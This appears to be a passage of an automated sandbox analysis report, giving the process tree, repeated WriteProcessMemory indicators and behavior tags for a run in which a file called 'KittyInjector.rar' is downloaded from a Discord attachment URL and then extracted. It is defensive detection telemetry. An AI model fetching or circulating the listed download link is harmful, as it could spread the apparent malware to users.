4996	IEXPLORE.EXE
4996	IEXPLORE.EXE
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
1432	OpenWith.exe
2240	OpenWith.exe
2240	OpenWith.exe
2240	OpenWith.exe
2240	OpenWith.exe
2240	OpenWith.exe
2240	OpenWith.exe
2240	OpenWith.exe
2240	OpenWith.exe
2240	OpenWith.exe
2240	OpenWith.exe
2240	OpenWith.exe
2240	OpenWith.exe
2240	OpenWith.exe
2240	OpenWith.exe
2240	OpenWith.exe
2240	OpenWith.exe
2240	OpenWith.exe
5064	chrome.exe
5064	chrome.exe
5064	chrome.exe
2996	chrome.exe
2996	chrome.exe
2996	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

iexplore.exechrome.exe

description	pid	process	target process
PID 5028 wrote to memory of 4996	5028	iexplore.exe	IEXPLORE.EXE
PID 5028 wrote to memory of 4996	5028	iexplore.exe	IEXPLORE.EXE
PID 5028 wrote to memory of 4996	5028	iexplore.exe	IEXPLORE.EXE
PID 4756 wrote to memory of 2548	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 2548	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 3280	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 1116	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 1116	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 2576	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 2576	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 2576	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 2576	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 2576	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 2576	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 2576	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 2576	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 2576	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 2576	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 2576	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 2576	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 2576	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 2576	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 2576	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 2576	4756	chrome.exe	chrome.exe
PID 4756 wrote to memory of 2576	4756	chrome.exe	chrome.exe

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://cdn.discordapp.com/attachments/1003969227297935410/1048654839548223488/KittyInjector.rar
1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5028

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5028 CREDAT:17410 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4996

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1432

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 444 -p 4192 -ip 4192
1⤵
PID:3668

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4192 -s 2452
1⤵
- Program crash
PID:204

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4356

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap14706:88:7zEvent4146 -ad -saa -- "C:\Users\Public\Downloads\KittyInjector"
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4592

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4920

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc1a5c4f50,0x7ffc1a5c4f60,0x7ffc1a5c4f70
2⤵
PID:2548

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1680 /prefetch:2
2⤵
PID:3280

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2024 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2284 /prefetch:8
2⤵
PID:2576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2984 /prefetch:1
2⤵
PID:4236

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1
2⤵
PID:948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:1
2⤵
PID:4840

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4488 /prefetch:8
2⤵
PID:456

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4496 /prefetch:8
2⤵
PID:2144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4784 /prefetch:8
2⤵
PID:3976

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4736 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3508

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4996 /prefetch:8
2⤵
PID:3800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4536 /prefetch:8
2⤵
PID:3760

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4648 /prefetch:8
2⤵
PID:4892

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4488 /prefetch:8
2⤵
PID:4400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5400 /prefetch:8
2⤵
PID:4260

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5532 /prefetch:8
2⤵
PID:2284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5032 /prefetch:8
2⤵
PID:1204

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5700 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4696 /prefetch:8
2⤵
PID:404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4544 /prefetch:8
2⤵
PID:668

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5756 /prefetch:8
2⤵
PID:2480

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
2⤵
PID:5028

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
2⤵
PID:904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4592 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1276

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4016 /prefetch:8
2⤵
- Drops file in Program Files directory
PID:2552

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1
2⤵
PID:4996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3956 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4204

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3412 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4900 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
2⤵
PID:4328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3688 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2456

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5156 /prefetch:8
2⤵
PID:4716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2648 /prefetch:8
2⤵
PID:1972

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2712 /prefetch:8
2⤵
PID:2532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:8
2⤵
PID:2900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6040 /prefetch:8
2⤵
PID:2588

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
2⤵
PID:3968

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4844 /prefetch:1
2⤵
PID:1772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1
2⤵
PID:1424

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4012 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1508 /prefetch:8
2⤵
PID:2124

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5256 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5932 /prefetch:8
2⤵
PID:3604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4972 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2196

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2564 /prefetch:8
2⤵
PID:4064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=972 /prefetch:8
2⤵
PID:4668

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1416 /prefetch:8
2⤵
PID:3924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3612 /prefetch:8
2⤵
PID:4588

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5488 /prefetch:8
2⤵
PID:4832

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8
2⤵
PID:4044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4560 /prefetch:8
2⤵
PID:4908

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2160 /prefetch:8
2⤵
PID:3484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
2⤵
PID:3412

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2720 /prefetch:1
2⤵
PID:1528

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:1
2⤵
PID:1992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,14114253945977685319,11621635217886482663,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
2⤵
PID:1888

C:\Program Files\Google\Chrome\Application\chrome.exe
